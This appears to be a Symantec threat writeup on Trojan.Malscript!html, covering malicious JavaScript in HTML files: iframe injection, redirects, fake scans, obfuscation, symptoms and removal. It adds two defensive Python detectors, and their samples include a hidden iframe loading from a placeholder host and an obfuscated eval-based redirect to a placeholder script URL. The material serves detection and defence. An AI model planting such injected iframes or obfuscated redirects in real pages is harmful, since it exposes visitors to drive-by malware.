Trojan.Malscript!html

Discovered: January 15, 2008
Updated: April 23, 2010 8:50:57 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Linux, Mac, Windows

Trojan.Malscript!html is a detection name used by Symantec to identify HTML files that contain malicious JavaScript.

HTML files may contain malicious content for a number of reasons. The files may have been specially crafted to be intrinsically malicious, or they may be legitimate HTML files that have been infected by threats such as W32.Ramnit or W32.Fujacks.CE. The files may be downloaded onto the computer during Web browsing, by other malware, inside archive files, and through various other methods.

With the Web browser now used for online shopping, banking, social networking, and entertainment, it has become one of the most popular targets for attackers. The attack surface is large, with third-party plugins and extensions that extend browser capabilities also being vulnerable to attack. Browser compromise can therefore be the cause of some of the most significant security breaches and hence can cause a great deal of harm to compromised computers and the victims of the attacks.

Authors of malicious JavaScript may go to lengths to ensure that their code is obfuscated so that its functionality is hidden from casual observers and to complicate the task of analysis. Obfuscation may also be used in an attempt to create code that is able to circumvent security software.

When injected into an HTML file, malicious JavaScript can:

  • Exploit browser and plugin vulnerabilities to run arbitrary code
  • Display fake antivirus scans and other fraudulent information
  • Download JavaScript, HTML, and other files
  • Hijack browsing sessions
  • Redirect users to malicious websites
  • Steal information

If a Symantec antivirus product displays a detection alert for this threat, it means the computer is already protected and the Symantec product will effectively remove this threat from the computer.

Antivirus Protection Dates

  • Initial Rapid Release version January 18, 2008 revision 040
  • Latest Rapid Release version May 14, 2018 revision 016
  • Initial Daily Certified version January 18, 2008 revision 007
  • Latest Daily Certified version May 13, 2018 revision 022
  • Initial Weekly Certified release date January 16, 2008

Writeup By: Henry Bell



Background information
JavaScript is an interpreted scripting language that runs inside the Web browser. Although the code runs inside a security 'sandbox' that limits its access to the operating system and computer hardware, attackers have found ways in which to leverage the language to perform actions that may result in harm to the compromised computer.

JavaScript provides functions that allow the browser to be manipulated programmatically. The code can manipulate what is displayed by the browser, as well as certain aspects of the way in which Web pages are represented internally and how the user is able to interact with them. JavaScript also provides control over certain Web navigation features.

In addition to features of the JavaScript language that can be used for malicious purposes, JavaScript can also be used as a means to exploit browser vulnerabilities as well as vulnerabilities in third-party plugins.


Iframe injection
One of the most common ways in which malicious JavaScript can be injected into an HTML page is through the use of the inline frame feature of HTML. Inline frames are usually referred to using the name of the corresponding HTML keyword, 'iframe'. An iframe may legitimately be used to embed content from one Web page directly into another. For example, this may be done to display real-time content from [REMOTE DOMAIN NAME].com within a page on [HOST DOMAIN NAME].com.

Attackers may insert invisible iframes into HTML files to load remote code, steal information, hijack the browser, and so on. Injected iframes are typically appended to the end of HTML files and may not be noticeable to the casual observer.
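The indicators described above (zero-size frames, CSS that hides the frame, and an iframe appended after the document has ended) can be checked mechanically. The following is an added example for this writeup, not Symantec's detection logic: a standard-library Python auditor that parses an HTML file, flags iframes showing any of those indicators, and notes whether the frame's source host differs from the page's own host. The sample page and the hostnames example-shop.test and bad-host.test are constructed placeholders.

```python
"""Flag hidden or appended <iframe> elements in an HTML file.

Added example for this writeup; it is not Symantec's detection logic. It uses only
the standard library and implements the indicators the text describes: zero-size
frames, CSS that hides the frame, and frames appended after </body> or </html>.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (hostnames are placeholders, not real indicators): a
# visible same-site iframe, then a hidden iframe appended after the document ends.
SAMPLE_HTML = """<html><head><title>Shop</title></head>
<body>
<iframe src="https://example-shop.test/ticker" width="300" height="80"></iframe>
<p>Welcome</p>
</body></html>
<iframe src="http://bad-host.test/in.php" width="0" height="0" style="visibility:hidden"></iframe>
"""

# Inline styles commonly used to keep a frame out of sight
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d", re.I)


def _tiny(value):
    """True for width/height attributes of 0 or 1 (px), with or without a unit."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= 1


class IframeAuditor(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.after_document_end = False  # set once </body> or </html> has been seen
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if self.after_document_end:
            reasons.append("after-document-end")
        if not reasons:
            return  # visible, in-document frames (widgets, ads) are not flagged
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        line, _ = self.getpos()
        self.findings.append({
            "line": line,
            "src": a.get("src", ""),
            "reasons": reasons,
            "cross_domain": bool(host) and host != self.page_host,
        })

    def handle_endtag(self, tag):
        if tag in ("body", "html"):
            self.after_document_end = True


def audit_iframes(html, page_host):
    """Return a list of suspicious iframes found in html; [] means nothing flagged."""
    parser = IframeAuditor(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for f in audit_iframes(SAMPLE_HTML, "example-shop.test"):
        print(f"line {f['line']}: {f['src']} -> {', '.join(f['reasons'])}"
              f"{' (cross-domain)' if f['cross_domain'] else ''}")
```

Run against the sample, the visible ticker frame is ignored and the appended frame is reported on line 6 with all three reasons and a cross-domain source. A cross-domain source alone is deliberately not a finding, since legitimate pages embed remote widgets exactly as the text describes; it is reported only as context for a frame that is already hidden.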




Redirects to malicious URLs
Malicious JavaScript may be used to redirect users to malicious URLs that attempt to load further malware onto the computer by way of browser or plugin exploits that lead to drive-by downloads. This provides attackers with a channel through which to execute any arbitrary program on users' computers.


Fake security scans
JavaScript can be used to display fake antivirus scans that may appear to be standalone programs. Icons and interface paradigms from the Windows OS are appropriated to make the scan appear to be authentic. Following the fake scan, users are prompted to download a fraudulent program (Trojan.FakeAV) to 'fix' the non-existent threats.




Browser hijacks
Web browsing sessions may be hijacked by JavaScript that performs operations on browser windows and controls. Window sizes and controls may be altered, or the JavaScript may cause the browser to reload the same page or image multiple times in order to increase hit counts for a particular image, Web page, or advertising campaign. Malicious JavaScript may also be used by attackers to steal information entered into the Web browser; online banking sign-in details and credit card numbers, for example.


Browser exploits

JavaScript may be used to exploit browser vulnerabilities or vulnerabilities in third-party plugins. Modern Web browsers are complex, and by definition are able to download content from remote locations. This means that flaws in Web browsers can be especially damaging, as a user need only be directed to a malicious URL in order for the exploit to function.

Specially crafted exploit code may target flaws in the way a browser handles the JavaScript language itself, which can lead to an attacker running further malicious code on the compromised computer; JavaScript can also be used to deliver the exploit code to another exploitable target, such as a browser plugin or other program.


Obfuscation

Malicious JavaScript is often obfuscated so as to conceal its functionality from casual observers. The obfuscation may take the form of simply re-encoding certain strings to mask URLs, or at the other end of the scale may involve encrypting the code itself so that it is completely unrecognizable.
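Both ends of the obfuscation scale described above, and the redirect technique from the earlier section, leave indicators that an analyst can score and partially undo. The following is an added example for this writeup, not Symantec's detection logic: a Python scorer that counts common obfuscation indicators (eval, String.fromCharCode, unescape, long percent- or hex-encoded runs, very long string literals), reports the script's character entropy, and decodes the simplest cases of string re-encoding so that a masked URL becomes readable. The sample script, the indicator weights and the hostname evil-host.test are constructed for illustration.

```python
"""Score a script body for common JavaScript obfuscation indicators and recover
encoded strings.

Added example for this writeup, not Symantec's detection logic. The indicator list
and weights are illustrative choices, not a published signature set.
"""
import math
import re
from urllib.parse import unquote

# Constructed sample: the target URL is percent-encoded, the property name is built
# from character codes, and the redirect is assembled at run time with eval().
# evil-host.test is a placeholder, not a real indicator.
SAMPLE_SCRIPT = (
    'var s = unescape("%68%74%74%70%3A%2F%2F%65%76%69%6C%2D%68%6F%73%74'
    '%2E%74%65%73%74%2F%69%2E%6A%73");'
    'eval(String.fromCharCode(108,111,99,97,116,105,111,110) + ".href = s");'
)
# Ordinary page script for comparison
CLEAN_SCRIPT = 'document.getElementById("count").textContent = items.length;'

PERCENT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

# (name, pattern, weight); weights are illustrative
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("fromCharCode", re.compile(r"String\.fromCharCode"), 2),
    ("unescape", re.compile(r"\bunescape\s*\("), 2),
    ("document.write", re.compile(r"document\.write\s*\("), 1),
    ("percent-encoded-run", PERCENT_RUN, 2),
    ("hex-escape-run", re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}"), 2),
    ("long-string-literal", re.compile(r"[\"'][^\"']{200,}[\"']"), 1),
]


def shannon_entropy(text):
    """Bits per character; densely encoded text tends to score higher than plain code."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_percent_runs(script):
    """Recover the plain text that unescape() would produce from %XX runs."""
    return [unquote(m.group(0)) for m in PERCENT_RUN.finditer(script)]


def decode_charcode_calls(script):
    """Decode String.fromCharCode(n, n, ...) calls whose arguments are integer literals."""
    decoded = []
    for m in CHARCODE_CALL.finditer(script):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def score_script(script):
    """Return the indicator hits, their summed weight, entropy and any decoded strings."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(script)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {
        "score": score,
        "hits": hits,
        "entropy": round(shannon_entropy(script), 2),
        "decoded": decode_percent_runs(script) + decode_charcode_calls(script),
    }


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SCRIPT), ("clean", CLEAN_SCRIPT)):
        print(label, score_script(src))
```

On the sample the scorer reports eval, fromCharCode, unescape and a percent-encoded run, and the decoded strings show the masked URL and the property name "location" that the script only assembles at run time. Note what it misses: "document.write" is not matched because a real script would build that name from character codes just as the sample builds "location", which is why a scorer of this kind is a triage aid rather than a verdict, and why the writeup says obfuscation is used to complicate analysis and evade security software.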


Are there any tell-tale signs?
The following symptoms may be observed when a Web page that contains malicious JavaScript is opened in the browser:

  • Pop-up windows
  • Empty windows
  • Multiple redirects, possibly to malicious sites
  • Embedded iframes
  • Plugins or other programs starting unexpectedly
  • Other strange or unexpected behavior within the browser

Note: The above behaviors do not necessarily indicate the presence of malicious JavaScript.

Some browsers or browser add-ons can be configured to warn users when certain suspicious JavaScript features are encountered.


What are the risks?
Because of today's reliance on the Web browser, malicious JavaScript can have a significant impact if it is allowed to execute. The most serious harm results when JavaScript is used to exploit a browser vulnerability and then download and execute further malicious executables without the user's knowledge. For this reason, many sophisticated targeted attacks begin with a browser exploit, as it is easy to coerce or persuade users into visiting a malicious URL.


What can I do to minimize the risks?
Users should always ensure that they are running the most up-to-date version of their chosen Web browser and upgrade to the most recently released third-party plugins. Although disabling JavaScript altogether is one way to improve security, its use is required for many Web technologies to function correctly. As such, users are recommended to make use of Web browser features, plugins, or add-ons that can be used to block certain JavaScript features. Users may also consider using tools that block JavaScript from sites not on a whitelist.

Users should always run up-to-date antivirus software with real-time protection such as Norton Antivirus, Norton Internet Security, Norton 360 or Symantec Endpoint Protection.

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.


You may have arrived at this page either because you have been alerted by your Symantec product about this risk, or you are concerned that your computer has been affected by this risk.

Before proceeding further we recommend that you run a full system scan. If that does not resolve the problem you can try one of the options available below.



FOR NORTON USERS
If you are a Norton product user, we recommend you try the following resources to remove this risk.

Removal Tool


If you have an infected Windows system file, you may need to replace it using the Windows installation CD.


How to reduce the risk of infection
The following resources provide further information and best practices to help reduce the risk of infection.


FOR BUSINESS USERS
If you are a Symantec business product user, we recommend you try the following resources to remove this risk.

Identifying and submitting suspect files
Submitting suspicious files to Symantec allows us to ensure that our protection capabilities keep up with the ever-changing threat landscape. Submitted files are analyzed by Symantec Security Response and, where necessary, updated definitions are immediately distributed through LiveUpdate™ to all Symantec endpoints. This ensures that other computers nearby are protected from attack. The following resources may help in identifying suspicious files for submission to Symantec.


Removal Tool

If you have an infected Windows system file, you may need to replace it using the Windows installation CD.


How to reduce the risk of infection
The following resource provides further information and best practices to help reduce the risk of infection.
Protecting your business network



MANUAL REMOVAL
The following instructions pertain to all current Symantec antivirus products.

1. Performing a full system scan
How to run a full system scan using your Symantec product


2. Restoring settings in the registry
Many risks make modifications to the registry, which could impact the functionality or performance of the compromised computer. While many of these modifications can be restored through various Windows components, it may be necessary to edit the registry. See the Technical Details section of this writeup for information about which registry keys were created or modified. Delete registry subkeys and entries created by the risk and return all modified registry entries to their previous values.